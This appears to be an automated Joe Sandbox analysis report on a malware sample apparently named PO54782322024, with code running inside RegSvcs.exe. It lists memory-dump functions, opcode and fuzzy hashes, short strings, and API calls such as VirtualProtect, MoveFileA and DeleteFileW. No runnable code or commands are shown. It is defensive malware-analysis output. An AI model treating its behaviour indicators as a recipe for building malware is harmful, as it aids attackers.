Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f045e3be0efd2c9b157a8feea9d5ce62c95ef117ba5ce3d1c1f751c260a08326
Instruction ID: 01822af15d0ca5763e43a904571c2ce81560a07268be311d668337044d5d9ccd
Opcode Fuzzy Hash: f045e3be0efd2c9b157a8feea9d5ce62c95ef117ba5ce3d1c1f751c260a08326
Instruction Fuzzy Hash: A5B29830A0DB494FD369DB28C4A14B5B7E2FFD9305B0445BEE48AC72A6DE34E946C781

Function 00007FFD9B87A7B1 Relevance: 1.5, Instructions: 1465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8beb3439ce5921a61f99c5af7750fcd62e09a2449b8411b2d55596325536c0b
Instruction ID: 14d4f8e5f5b0d498e6f63dc9d46da6724c2db48850c5da1bf901b9c4e594c30b
Opcode Fuzzy Hash: c8beb3439ce5921a61f99c5af7750fcd62e09a2449b8411b2d55596325536c0b
Instruction Fuzzy Hash: 83A25731A1DB4E8FE319DB28C4A44B5B7E1FF99309B1545BED08AC72A2DE34E946C740

Function 00007FFD9B87F519 Relevance: 1.4, Instructions: 1355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecc7b7cfb7fd58bc7ca7ad50ee9d57e693b0c39d675f889f13df0d3eda9e1683
Instruction ID: cd879faf6aacb7aff3a2021830338cfaf36eb087e0ddf9eed1f20a61ea52ff0b
Opcode Fuzzy Hash: ecc7b7cfb7fd58bc7ca7ad50ee9d57e693b0c39d675f889f13df0d3eda9e1683
Instruction Fuzzy Hash: 2BA2D571A0E68D8FDBA8DB68C4A5A7877E1FF59304F5500BDD04EC72A2DA38AD41CB41

Function 00007FFD9B87BC7A Relevance: .7, Instructions: 706
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b3958a57376f6dec84eba64fdd9bc7350bcdcfe98f1d43d765967421f528a4
Instruction ID: 8a4feb2f3613dc06485d049932c0db25b42a980b35e15a287c97cb3c256b2507
Opcode Fuzzy Hash: e5b3958a57376f6dec84eba64fdd9bc7350bcdcfe98f1d43d765967421f528a4
Instruction Fuzzy Hash: B8221730B0DA0D4FDB68DB6C98A5A7977E1EF59304F1501BDE04EC72A2DE24ED428B81

Function 00007FFD9B87A3D0 Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a79e99dfe1ed185033199f24b06740dc66cc4389b1b8bc9cf10c1e9ce734e727
Instruction ID: 54344e64a4dc622a59413d92b468de030461357d200f99b5bcef243b3343c2c0
Opcode Fuzzy Hash: a79e99dfe1ed185033199f24b06740dc66cc4389b1b8bc9cf10c1e9ce734e727
Instruction Fuzzy Hash: 4DD19C31A1DB894FE32CCB6884A50B1B7E2FF99305B15467EE4CAC32B1DA34E542C781

Function 00007FFD9B8832BC Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e048cafea241dc0e27af0c0c3d212ed74a6233e1284fd14424215d71851fbadb
Instruction ID: 02627fd9012f0844161b64813e16c66ea5249cc1056a8f3deac9b40b8a47b27a
Opcode Fuzzy Hash: e048cafea241dc0e27af0c0c3d212ed74a6233e1284fd14424215d71851fbadb
Instruction Fuzzy Hash: F4415B31A0D7490FD71E9B789C660B63B95DB47220B0582BFE497CB2E7DC24684783D1

Function 00007FFD9B883309 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae20fcac0c63c7926996229902b106ea4a2d5c66c5a49d6b545feaf3965cad6e
Instruction ID: 07597431d19802069320486398e2730062d58b64ba7daff4eec12a788b45424d
Opcode Fuzzy Hash: ae20fcac0c63c7926996229902b106ea4a2d5c66c5a49d6b545feaf3965cad6e
Instruction Fuzzy Hash: 5E415C3160D7891FD72F9B748C615663FA5EB47210F0582BFE096C71E7DD2468078392

Function 00007FFD9B870D60 Relevance: 1.8, APIs: 1, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a847715850288b07582571170f6a863aa69a9953042708d4177887aba516b20
Instruction ID: 59922d0ea9ca8d061d75a211116c8b2fccbc52596ebd0f9dcb6e4f0990abbb54
Opcode Fuzzy Hash: 7a847715850288b07582571170f6a863aa69a9953042708d4177887aba516b20
Instruction Fuzzy Hash: DF816731B1D64E4FEB288BA8D8A26B9BBD1EF45314F04417ED08EC31E7DD29B8028741

Function 00007FFD9B871A52 Relevance: 1.6, APIs: 1, Instructions: 146
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD9B871B02

Memory Dump Source

Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f5e04a0e732cd2e82482bcfd107e165134695dd56c0a9d4fa1ea352a72494fd4
Instruction ID: 17b899a9768cfeed691812ab256d8dff065fe1eee46f9d39b40cbd2216a0f047
Opcode Fuzzy Hash: f5e04a0e732cd2e82482bcfd107e165134695dd56c0a9d4fa1ea352a72494fd4
Instruction Fuzzy Hash: 6631C431A0CB4C8FDB1CEF98A8466F9B7E1FB99321F04427FD049C3592DB65A8468781

Function 00007FFD9B877F1D Relevance: 1.6, APIs: 1, Instructions: 125
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD9B886891

Memory Dump Source

Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f6a6685468bb93dc6c9c78e86b23f8a562c2cb181a1471e536668ab09b9bfd8d
Instruction ID: 509f498a23d76309e1b61190d3de399fd864cf620c5608d8a5ead5f5606235fb
Opcode Fuzzy Hash: f6a6685468bb93dc6c9c78e86b23f8a562c2cb181a1471e536668ab09b9bfd8d
Instruction Fuzzy Hash: 89312831A0DA4C4FDB18DB9DD8456F9BBE1EF95321F00427FD04AC3292CB606846C791

Function 00007FFD9B870C61 Relevance: 1.6, APIs: 1, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00007FFD9B870D1F

Memory Dump Source

Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: e78a53a4035e5ee5d0a4edf94a04d810532d32d90b9369d3011ea39ebc63180d
Instruction ID: 57995a0b9bbe474d4c95a09e6374b0d10a79565e5d19a7ac587b56df4e57c5ce
Opcode Fuzzy Hash: e78a53a4035e5ee5d0a4edf94a04d810532d32d90b9369d3011ea39ebc63180d
Instruction Fuzzy Hash: E231267050D7889FDB26DBA88895AFA7FF4EF56321F0441AFD0C9C3093D6246546CB52

Function 00007FFD9B9510C9 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907444028.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b950000_PO54782322024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e63f86029247a0542b881196841e542c9918b3782bbc7872e6a1e722e2cd5ced
Instruction ID: d41711915ae6ae9ea5d181cd4b12810793fb7051e940a7c1249f36e63959abca
Opcode Fuzzy Hash: e63f86029247a0542b881196841e542c9918b3782bbc7872e6a1e722e2cd5ced
Instruction Fuzzy Hash: 11415A32A4DA9D5FDF66DF94C8654E83BB0FF15304F0601FAD849CB1A2DA65AD41C780

Analysis Process: RegSvcs.exePID: 2476, Parent PID: 6844COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	317
Total number of Limit Nodes:	38

Executed Functions

Function 063D3600 Relevance: 5.6, Strings: 4, Instructions: 605
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 063D3E14
$fq, xrefs: 063D3DFE
$fq, xrefs: 063D3DE3
$fq, xrefs: 063D3DD7

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: db377a60b94f88632a4f0f1dc8a7f288db76e3a724a0859a38b5bdfa339a55c0
Instruction ID: 3c4b59307f9ef68c6c9016f4b705e4578728a7c87c589abc8358d256a6f4bff0
Opcode Fuzzy Hash: db377a60b94f88632a4f0f1dc8a7f288db76e3a724a0859a38b5bdfa339a55c0
Instruction Fuzzy Hash: D6424131E106198BDB14EB75C9546EEB7F2FFC9340F1086A9D509A7264EF309E85CB81

Function 063D82B8 Relevance: 3.0, Strings: 2, Instructions: 518
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 063D88D2
$fq, xrefs: 063D88DE

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $fq$$fq
API String ID: 0-2537786760
Opcode ID: 82d9206112bf9f1eb3b9c077c9bffc089942ff4fe3c44319659dfd86649c4e2b
Instruction ID: ee000810d12dd21bc7a41d5a58996f50749b0c9ea1489f0a2c165ac9b22c3d01
Opcode Fuzzy Hash: 82d9206112bf9f1eb3b9c077c9bffc089942ff4fe3c44319659dfd86649c4e2b
Instruction Fuzzy Hash: F202B031B002198FDB54EB79E950AAEB7E2FF84340F148429E506EB395DE35EC4687C1

Function 063D58D8 Relevance: 1.9, Strings: 1, Instructions: 609
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 063D5C2E

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: f4aaed31ddacd033469f15e1ff3dde3bfe97a2d7644f81c3f575e27215c66e57
Instruction ID: 8e16dfa3b12bd9c5eda8128bea96968aa4809b243c95eb3f4d7b98c16a68579f
Opcode Fuzzy Hash: f4aaed31ddacd033469f15e1ff3dde3bfe97a2d7644f81c3f575e27215c66e57
Instruction Fuzzy Hash: 0622D372F002198FDF61DBA8D4806AEB7B2EF85360F248469E515EB394DA35DC45CBD0

Function 063D6980 Relevance: .9, Instructions: 867COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b48db19e8431e6295f15d584dca4cc2f355986bbaac24ff2744aeb10e98eff6
Instruction ID: 0cf289133596ab1f858004d7676bbe92c76e96404a020aac5953a5bde61cea76
Opcode Fuzzy Hash: 5b48db19e8431e6295f15d584dca4cc2f355986bbaac24ff2744aeb10e98eff6
Instruction Fuzzy Hash: 8E62AF31B002088FDB54DB68E991AAEB7F2EF85350F148469E416EB391DB35ED46CBD0

Function 063DD058 Relevance: .7, Instructions: 734COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f164ba15effd4cd807645a329b0bab259b8a07fd9ca6346fb45104269092265
Instruction ID: 7d504411ceb63b0837a06bb2831c0556ab3627794a5ac6a6adb7685bec9ac376
Opcode Fuzzy Hash: 8f164ba15effd4cd807645a329b0bab259b8a07fd9ca6346fb45104269092265
Instruction Fuzzy Hash: F0426E31B001099BDB54EBB8E891BAEB7B2FF84350F108429E506EB395DE35DC4687D1

Function 063DBC58 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc4c81bc2b7ce3bc1c5f4bf815c9cd83e7db53f25203535d0808da47054df2e0
Instruction ID: 57400f0942ac114e87698bac1c6907fa7d329af0f4f37892824f6d240c81f5df
Opcode Fuzzy Hash: bc4c81bc2b7ce3bc1c5f4bf815c9cd83e7db53f25203535d0808da47054df2e0
Instruction Fuzzy Hash: 53227F71E101098BDF64DBA8E8907AEB7B6FB49350F209426E506EB391CA34DC85DBD1

Function 063DB6A8 Relevance: 10.4, Strings: 8, Instructions: 417
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 063DB867
$fq, xrefs: 063DB83E
$fq, xrefs: 063DB7D9
$fq, xrefs: 063DB8A2
$fq, xrefs: 063DB896
$fq, xrefs: 063DB7E5
$fq, xrefs: 063DB832
$fq, xrefs: 063DB873

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-3929485403
Opcode ID: b9f807628d4bcc4a010a343df176f4eda279c0aa304915922e568f7b19cc500f
Instruction ID: 0ebfa801606cdfbb62fc4ac08d38eb26d3487e1ee79ef0bf23e681b4ac8862ab
Opcode Fuzzy Hash: b9f807628d4bcc4a010a343df176f4eda279c0aa304915922e568f7b19cc500f
Instruction Fuzzy Hash: 7EE18F71E002098FDB64DBB9E8906AEB7B2FF85300F118529E506EB355DF359846CB91

Function 063D97E0 Relevance: 5.3, Strings: 4, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 063D9853
$fq, xrefs: 063D9847
$fq, xrefs: 063D98C9
$fq, xrefs: 063D98B3

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: ee4e8e8bc89c273cf6db1a4e1f9448b5a2f8e3f403c6290a12f4fa7dde496707
Instruction ID: bc0c9a91f6bd4ee4924788d102c2e62b64a78bf589313c9baf468e92a49d1fd1
Opcode Fuzzy Hash: ee4e8e8bc89c273cf6db1a4e1f9448b5a2f8e3f403c6290a12f4fa7dde496707
Instruction Fuzzy Hash: 57C15931E002198FDB64DF65D991BEEB7B2FF88340F1085A9D509AB394DB319E818F91

Function 063DDF88 Relevance: 4.7, Strings: 3, Instructions: 908
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 063DE42F
$fq, xrefs: 063DE41B
$fq, xrefs: 063DE423

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq
API String ID: 0-837900676
Opcode ID: cc6d7a0b3c2ccb1766c84613b9359d418145d02c03435df5318c3784f7fb7915
Instruction ID: d307034c956cdc17fed694c413c0a748293e7424728effdbd5f553ec0df8d339
Opcode Fuzzy Hash: cc6d7a0b3c2ccb1766c84613b9359d418145d02c03435df5318c3784f7fb7915
Instruction Fuzzy Hash: 7572A235B002188FDB64EB68C951B6EB7B3FF84340F2084A9D50AAB395DF359D85CB91

Function 063D4E98 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fkq, xrefs: 063D4EC3
\Okq, xrefs: 063D504B
XPkq, xrefs: 063D4FBC

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: fkq$XPkq$\Okq
API String ID: 0-673657909
Opcode ID: 38aeb5cba67ba1d93b4df588e0613566ab7283cf013103fd95ca5f64a5aabd1a
Instruction ID: 6ec2cf264b46c80f8207d068f7731b713058f82bef9d7472ae33626c8c454621
Opcode Fuzzy Hash: 38aeb5cba67ba1d93b4df588e0613566ab7283cf013103fd95ca5f64a5aabd1a
Instruction Fuzzy Hash: CE51B231F002189FEB549BA9D8147AEBAF6FF88354F208429E506EB3D5DE794C058BD1

Function 063D97CF Relevance: 2.7, Strings: 2, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 063D9847
$fq, xrefs: 063D98B3

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $fq$$fq
API String ID: 0-2537786760
Opcode ID: 1a8931013fc5afac57d898ea6640285e4fc158b4056550aaf52fb989a5978e78
Instruction ID: 267f7ecec6c55019e2c024d26ed75337334220ee3d14ef13710f3cdca70877dc
Opcode Fuzzy Hash: 1a8931013fc5afac57d898ea6640285e4fc158b4056550aaf52fb989a5978e78
Instruction Fuzzy Hash: B4912871E002198FDB64DB68D991BEEB7B2FF48740F0084A9D509A7394DA309E85CF91

Function 063D4E89 Relevance: 2.6, Strings: 2, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fkq, xrefs: 063D4EC3
XPkq, xrefs: 063D4FBC

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: fkq$XPkq
API String ID: 0-3439102645
Opcode ID: e740d16c159433e48425bd82114a4b78090a4bbc49782371d88a0cf78086ad6b
Instruction ID: bc981f47c6ce4dddcb9026e5b9269e8231b9609cdba63885ce99ad2abe5f6250
Opcode Fuzzy Hash: e740d16c159433e48425bd82114a4b78090a4bbc49782371d88a0cf78086ad6b
Instruction Fuzzy Hash: BE41D571F002189BEB549BA8C8147AEBAF7FF88750F204429E506EB3D5DE798C058BD1

Function 00FF8988 Relevance: 1.6, APIs: 1, Instructions: 67
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 00FF8A20

Memory Dump Source

Source File: 00000002.00000002.4116405806.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ff0000_RegSvcs.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 3cf46d7b2018f98d2baa4acad240d98a5d252547f18d01ccc2d6755092c56eea
Instruction ID: 74937bc033cdfb620206da85482eaf821f30718fbc71611bb2c9de8d68f6832f
Opcode Fuzzy Hash: 3cf46d7b2018f98d2baa4acad240d98a5d252547f18d01ccc2d6755092c56eea
Instruction Fuzzy Hash: 422155B6C002099FCB10CF99D884ADEFFF1FF88320F24805AE918AB215C7759941CBA0

Function 00FF8990 Relevance: 1.6, APIs: 1, Instructions: 62
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 00FF8A20

Memory Dump Source

Source File: 00000002.00000002.4116405806.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ff0000_RegSvcs.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: e858ac1e01b87cfde4810a47f7f8d84e9db85b051b3f6d704e9c3e3905fd840e
Instruction ID: 32b79f1ef35afaa9ceb731895b74ea0d961490229f2ca9e2222493dc85740fcd
Opcode Fuzzy Hash: e858ac1e01b87cfde4810a47f7f8d84e9db85b051b3f6d704e9c3e3905fd840e
Instruction Fuzzy Hash: 8F2116B6C012099FCB10CF99D984ADEFBF5FF88320F24805AE918AB214D7755941DBA5

Function 00FF83A0 Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(00000000), ref: 00FF8418

Memory Dump Source

Source File: 00000002.00000002.4116405806.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ff0000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: d1b38ba60259e976518df1d3e8f293c7f3654d1bcda083d8f1b5ee61a78ddbfd
Instruction ID: 82b50252d27057b9b67582f8824f69d7f13523ec150847db281f1f135dcee443
Opcode Fuzzy Hash: d1b38ba60259e976518df1d3e8f293c7f3654d1bcda083d8f1b5ee61a78ddbfd
Instruction Fuzzy Hash: B72156B5C0065ACBCB10CF9AD441BEEFBB4FF48320F14816AD918A7240D778A941CFA1

Function 00FF7AAC Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(00000000), ref: 00FF8418

Memory Dump Source

Source File: 00000002.00000002.4116405806.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ff0000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 288cd3de7546276b5f0d15ee38c04a65fd30a0c5afba5b05d56f457449b94e64
Instruction ID: bca0d11e834685653eb955f71f789e186e7674cc47c18c0d2cadf941a62985d0
Opcode Fuzzy Hash: 288cd3de7546276b5f0d15ee38c04a65fd30a0c5afba5b05d56f457449b94e64
Instruction Fuzzy Hash: FE2158B5C0061ADBCB10CF9AC445BAEFBF4FF48320F10816AD918A7250D778A941DFA1

Function 063DED41 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

PHfq, xrefs: 063DEE9F

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PHfq
API String ID: 0-2154135885
Opcode ID: 8e100a860ef566f13fa155746c9fac755977621a3981368953beee53fd2dccee
Instruction ID: c9d84064c45131c44f939bbe0671756663ded8b7b8f8126b91b13cdf4e8968ee
Opcode Fuzzy Hash: 8e100a860ef566f13fa155746c9fac755977621a3981368953beee53fd2dccee
Instruction Fuzzy Hash: E7418E72E00209DFDB559F64E8846AEBBB6FF85740F204929E406EB240DF74D946CBC1

Function 063D26A8 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

PHfq, xrefs: 063D27FA

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PHfq
API String ID: 0-2154135885
Opcode ID: e226d256f674b6f4311e885398efaab3c1c1b993633400794a1ce3a314b8a709
Instruction ID: 015b063971249a121d23bd84396b734de74be05f899c81335777e9d62ffb0400
Opcode Fuzzy Hash: e226d256f674b6f4311e885398efaab3c1c1b993633400794a1ce3a314b8a709
Instruction Fuzzy Hash: FD312432B002098FDB58AB38D91466F7AE7AF89240F20442CD606DB395EE35CD46D7E1

Function 05005D9E Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

(jq, xrefs: 05005DBF

Memory Dump Source

Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd

Similarity

API ID:
String ID: (jq
API String ID: 0-3225323518
Opcode ID: 67b3f972fed1c8ff9ebc072b1dc407448f5ef9334539dbddf1d8bfc41118de97
Instruction ID: 2e6827a4ed454acf4e2708ee9c4f9aeb3f6a6354b2c4a57663439f27b5904f18
Opcode Fuzzy Hash: 67b3f972fed1c8ff9ebc072b1dc407448f5ef9334539dbddf1d8bfc41118de97
Instruction Fuzzy Hash: 204158B0D00248CFDB28DFA9D88479EBBF1FF48310F24856AE449AB291C7755842CF51

Function 05002285 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

(jq, xrefs: 05003912

Memory Dump Source

Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd

Similarity

API ID:
String ID: (jq
API String ID: 0-3225323518
Opcode ID: 418f1655a372d35365d9ea5f40551f53d942921e2066e80847e905a14554d281
Instruction ID: 6e19b06499cbf0e416cef7de0ad37074e9fc744d978ccf43f962feb868b8b5b9
Opcode Fuzzy Hash: 418f1655a372d35365d9ea5f40551f53d942921e2066e80847e905a14554d281
Instruction Fuzzy Hash: 2E01FC3520828DAFDB4AEF64EC1089F3FA5EF82310F244859F5814B1D2C9309D12D7A2

Function 063D8898 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

$fq, xrefs: 063D88D2

Memory Dump Source

Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false

Joe Sandbox IDA Plugin

